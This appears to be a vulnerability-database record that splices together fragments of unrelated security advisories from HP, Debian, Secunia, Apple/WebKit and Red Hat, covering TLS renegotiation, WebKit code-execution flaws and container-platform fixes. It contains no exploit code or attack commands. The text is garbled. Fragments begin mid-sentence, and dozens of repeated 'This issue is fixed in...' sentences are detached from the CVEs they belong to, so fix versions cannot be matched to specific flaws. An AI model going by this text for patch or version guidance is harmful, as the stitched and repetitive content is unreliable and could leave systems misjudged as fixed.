943E21D4621B480B5E8E651ACB605B8F7EA47304
B.11.31 IA-64 / Apache 2.0.59.13 IA-PA-64-1131.depot /
B8836FDB73434A3C26FB411E3F7CB3211129E5AC
MANUAL ACTIONS: Yes
Install Apache v2.0.59.13 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security
Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a
specific HP-UX system. It can also download patches and create a depot automatically. For more information
see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
For Apache IPv4 and IPv6
HP-UX B.11.11
=============
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
action: install revision B.2.0.59.13 or subsequent
HP-UX B.11.23
=============
hpuxwsAPCH32.APACHE
hpuxwsAPCH32.APACHE2
hpuxwsAPCH32.AUTH_LDAP
hpuxwsAPCH32.AUTH_LDAP2
hpuxwsAPCH32.MOD_JK
hpuxwsAPCH32.MOD_JK2
hpuxwsAPCH32.MOD_PERL
hpuxwsAPCH32.MOD_PERL2
hpuxwsAPCH32.PHP
hpuxwsAPCH32.PHP2
hpuxwsAPCH32.WEBPROXY
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
action: install revision B.2.0.59.13 or subsequent
HP-UX B.11.31
=============
hpuxwsAPCH32.APACHE
hpuxwsAPCH32.APACHE2
hpuxwsAPCH32.AUTH_LDAP
hpuxwsAPCH32.AUTH_LDAP2
hpuxwsAPCH32.MOD_JK
hpuxwsAPCH32.MOD_JK2
hpuxwsAPCH32.MOD_PERL
hpuxwsAPCH32.MOD_PERL2
hpuxwsAPCH32.PHP
hpuxwsAPCH32.PHP2
hpuxwsAPCH32.WEBPROXY
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
action: install revision B.2.0.59.13 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 21 December 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
References: CVE-2009-3245, CVE-2009-3555, CVE-2009-4355, CVE-2010-0433, CVE-2010-0740.
The upgrades are available from the following location.
For Debian 7 (wheezy) this update adds a missing part to make it
actually possible to disable client-initiated renegotiation and
disables it by default (CVE-2009-3555). TLS compression is disabled
(CVE-2012-4929), although this is normally already disabled by the OpenSSL
system library. Finally it adds the ability to disable the SSLv3 protocol
(CVE-2014-3566) entirely via the new "DisableSSLv3" configuration
directive, although it will not disabled by default in this update.
For Debian 8 (jessie) these issues have been fixed prior to the release,
with the exception of client-initiated renegotiation (CVE-2009-3555).
This update addresses that issue for jessie.
For the oldstable distribution (wheezy), these problems have been fixed
in version 2.6-2+deb7u1.
For the stable distribution (jessie), these problems have been fixed in
version 2.6-6+deb8u1.
For the unstable distribution (sid), these problems have been fixed in
version 2.6-6.1.
We recommend that you upgrade your pound packages. ----------------------------------------------------------------------
Secunia CSI integrated with Microsoft WSUS and Microsoft SCCM for 3rd party Patch Management
Free webinars
http://secunia.com/vulnerability_scanning/corporate/webinars/
----------------------------------------------------------------------
TITLE:
OpenOffice.org Data Manipulation and Code Execution Vulnerabilities
SECUNIA ADVISORY ID:
SA40070
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/40070/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=40070
RELEASE DATE:
2010-06-08
DISCUSS ADVISORY:
http://secunia.com/advisories/40070/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/40070/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=40070
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in OpenOffice.org, which can
be exploited by malicious people to manipulate certain data or
compromise a user's system.
1) An error in the TLS protocol while handling session
re-negotiations in included libraries can be exploited to manipulate
session data.
For more information see vulnerability #1 in:
SA37291
2) An error when exploring python code through the scripting IDE can
be exploited to potentially execute arbitrary code.
The vulnerabilities are reported in versions prior to 3.2.1.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.openoffice.org/security/cves/CVE-2009-3555.html
http://www.openoffice.org/security/cves/CVE-2010-0395.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. This could force the server to
process an attacker's request as if authenticated using the victim's
credentials.
The TLS implementation in GnuTLS before 2.12.23, 3.0.x before 3.0.28,
and 3.1.x before 3.1.7 does not properly consider timing side-channel
attacks on a noncompliant MAC check operation during the processing
of malformed CBC padding, which allows remote attackers to conduct
distinguishing attacks and plaintext-recovery attacks via statistical
analysis of timing data for crafted packets, a related issue to
CVE-2013-0169 (CVE-2013-1619).
The updated packages have been patched to correct these issues.
HP Secure Web Server (SWS) for OpenVMS running CSWS_JAVA V3.1 and earlier. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Due
to a bug in lighttpd, the server fails to start in some configurations
if using the updated openssl libraries.
The packages for the hppa, mips, and mipsel architectures are not yet
available. They will be released as soon as they have been built |
|
var-201912-0128
|
A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * * information leak * * User impersonation * * Arbitrary code execution * * UI Spoofing * * Insufficient access restrictions * * Service operation interruption (DoS) * * Privilege escalation * * Memory corruption * * Authentication bypass. Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization. This issue was corrected by changing the way livestreams are downloaded. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. (CVE-2019-6237)
WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. (CVE-2019-8719)
This fixes a remote code execution in webkitgtk4. No further details are available in NIST. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. This issue is fixed in iOS 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. (CVE-2019-8766)
"Clear History and Website Data" did not clear the history. A user may be unable to delete browsing history items. (CVE-2019-8768)
An issue existed in the drawing of web page elements. Visiting a maliciously crafted website may reveal browsing history. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. (CVE-2019-8846)
WebKitGTK up to and including 2.26.4 and WPE WebKit up to and including 2.26.4 (which are the versions right prior to 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. (CVE-2020-10018)
A use-after-free flaw exists in WebKitGTK. This flaw allows remote malicious users to execute arbitrary code or cause a denial of service. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. A malicious website may be able to cause a denial of service. This issue is fixed in iCloud for Windows 7.17, iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS 13.3.1. A DOM object context may not have had a unique security origin. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A file URL may be incorrectly processed. (CVE-2020-3885)
A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. An application may be able to read restricted memory. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. (CVE-2020-3902).
Bug Fix(es):
* NVD feed fixed in Clair-v2 (clair-jwt image)
3. Solution:
Download the release images via:
quay.io/redhat/quay:v3.3.3
quay.io/redhat/clair-jwt:v3.3.3
quay.io/redhat/quay-builder:v3.3.3
quay.io/redhat/clair:v3.3.3
4. Bugs fixed (https://bugzilla.redhat.com/):
1905758 - CVE-2020-27831 quay: email notifications authorization bypass
1905784 - CVE-2020-27832 quay: persistent XSS in repository notification display
5. JIRA issues fixed (https://issues.jboss.org/):
PROJQUAY-1124 - NVD feed is broken for latest Clair v2 version
6. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update
Advisory ID: RHSA-2020:5633-01
Product: Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2020:5633
Issue date: 2021-02-24
CVE Names: CVE-2018-10103 CVE-2018-10105 CVE-2018-14461
CVE-2018-14462 CVE-2018-14463 CVE-2018-14464
CVE-2018-14465 CVE-2018-14466 CVE-2018-14467
CVE-2018-14468 CVE-2018-14469 CVE-2018-14470
CVE-2018-14553 CVE-2018-14879 CVE-2018-14880
CVE-2018-14881 CVE-2018-14882 CVE-2018-16227
CVE-2018-16228 CVE-2018-16229 CVE-2018-16230
CVE-2018-16300 CVE-2018-16451 CVE-2018-16452
CVE-2018-20843 CVE-2019-3884 CVE-2019-5018
CVE-2019-6977 CVE-2019-6978 CVE-2019-8625
CVE-2019-8710 CVE-2019-8720 CVE-2019-8743
CVE-2019-8764 CVE-2019-8766 CVE-2019-8769
CVE-2019-8771 CVE-2019-8782 CVE-2019-8783
CVE-2019-8808 CVE-2019-8811 CVE-2019-8812
CVE-2019-8813 CVE-2019-8814 CVE-2019-8815
CVE-2019-8816 CVE-2019-8819 CVE-2019-8820
CVE-2019-8823 CVE-2019-8835 CVE-2019-8844
CVE-2019-8846 CVE-2019-9455 CVE-2019-9458
CVE-2019-11068 CVE-2019-12614 CVE-2019-13050
CVE-2019-13225 CVE-2019-13627 CVE-2019-14889
CVE-2019-15165 CVE-2019-15166 CVE-2019-15903
CVE-2019-15917 CVE-2019-15925 CVE-2019-16167
CVE-2019-16168 CVE-2019-16231 CVE-2019-16233
CVE-2019-16935 CVE-2019-17450 CVE-2019-17546
CVE-2019-18197 CVE-2019-18808 CVE-2019-18809
CVE-2019-19046 CVE-2019-19056 CVE-2019-19062
CVE-2019-19063 CVE-2019-19068 CVE-2019-19072
CVE-2019-19221 CVE-2019-19319 CVE-2019-19332
CVE-2019-19447 CVE-2019-19524 CVE-2019-19533
CVE-2019-19537 CVE-2019-19543 CVE-2019-19602
CVE-2019-19767 CVE-2019-19770 CVE-2019-19906
CVE-2019-19956 CVE-2019-20054 CVE-2019-20218
CVE-2019-20386 CVE-2019-20387 CVE-2019-20388
CVE-2019-20454 CVE-2019-20636 CVE-2019-20807
CVE-2019-20812 CVE-2019-20907 CVE-2019-20916
CVE-2020-0305 CVE-2020-0444 CVE-2020-1716
CVE-2020-1730 CVE-2020-1751 CVE-2020-1752
CVE-2020-1971 CVE-2020-2574 CVE-2020-2752
CVE-2020-2922 CVE-2020-3862 CVE-2020-3864
CVE-2020-3865 CVE-2020-3867 CVE-2020-3868
CVE-2020-3885 CVE-2020-3894 CVE-2020-3895
CVE-2020-3897 CVE-2020-3898 CVE-2020-3899
CVE-2020-3900 CVE-2020-3901 CVE-2020-3902
CVE-2020-6405 CVE-2020-7595 CVE-2020-7774
